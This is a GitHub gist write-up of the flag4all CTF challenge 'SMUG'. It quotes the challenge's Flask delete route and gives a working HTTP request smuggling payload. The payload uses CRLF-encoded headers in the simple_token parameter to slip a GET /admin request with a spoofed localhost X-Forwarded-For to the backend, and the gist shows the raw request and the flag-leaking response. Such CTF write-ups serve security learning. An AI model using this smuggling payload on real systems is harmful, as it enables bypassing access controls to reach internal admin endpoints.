Skip to content

Instantly share code, notes, and snippets.

@xl00t
Created October 22, 2023 12:27
Show Gist options
  • Save xl00t/fcc9d6db83421209c10a6aa857626bac to your computer and use it in GitHub Desktop.
Save xl00t/fcc9d6db83421209c10a6aa857626bac to your computer and use it in GitHub Desktop.
flag4all - SMUG

SMUG - 498 points

6 Solves

My app is faulty can you get the flag?? https://smug.flag4all.sh Format du flag : flag{xxx}

Challenge source

app/app.py

@app.route('/delete', methods=['POST'])
def post_delete():
    post_idx = request.form.get('post_idx')
    print(post_idx)
    if not isinstance(post_idx, str) or not post_idx.isdecimal():
        abort(400)

    res = curl_back(f'/posts/{post_idx}', DELETE, request.remote_addr, g.simple_token)
    if res is None:
        abort(400)

    return render_template('/api_result.html', simple_token=g.simple_token, res=res)

Since /deletedosent beautify the response we can use it to perform our http request smuggling on it. We create a token and smuggle a second request to backend/admin endpoint to fetch the flag with this payload.

/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1 After sent to curl_back() function the simple_token header will smuggle and evaluate to theses requests:

/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
Content-Length: 2

2a

GET /admin HTTP/1.1
Host: 127.0.0.1:8000
Simple-Token: b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
X-Forwarded-For: 127.0.0.1
Content-Length: 0

GET / HTTP/1.1
...

When sending the payload to the challenge we can read the flag :

POST /delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1 HTTP/1.1
Host: smug.flag4all.sh
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

post_idx=0



HTTP/1.1 200 
content-type: text/html; charset=utf-8
date: Sat, 21 Oct 2023 15:54:28 GMT
server: Werkzeug/3.0.0 Python/3.11.6
content-length: 943
alt-svc: h3=":443";ma=900;
set-cookie: C00ki3_st1cks=srv_8e3764354bd1f2bc478366221e074e9125382782e4de6fdc445883887a99a536; path=/
connection: close

<!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="/static/css/normalize.css">
</head>
<body>
  <h2>Result</h2>
  <pre>
nullHTTP/1.1 200 OK
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 54
content-type: application/json

{&#34;message&#34;:&#34;flag{7847560c748814fd3070e9149a9578bd}\n&#34;}HTTP/1.1 401 Unauthorized
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 4
content-type: application/json

null
  </pre><br>
  <a href="/menu?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:+2%0D%0A%0D%0A2a%0D%0A%0D%0AGET+/admin+HTTP/1.1%0D%0AHost:+127.0.0.1:8000%0D%0ASimple-Token:+b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AX-Forwarded-For:+127.0.0.1%0D%0AContent-Length:+0%0D%0A%0D%0AGET+/+HTTP/1.1"><button id="cancel" type="submit" form="cancel_button">Go back</button></a>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment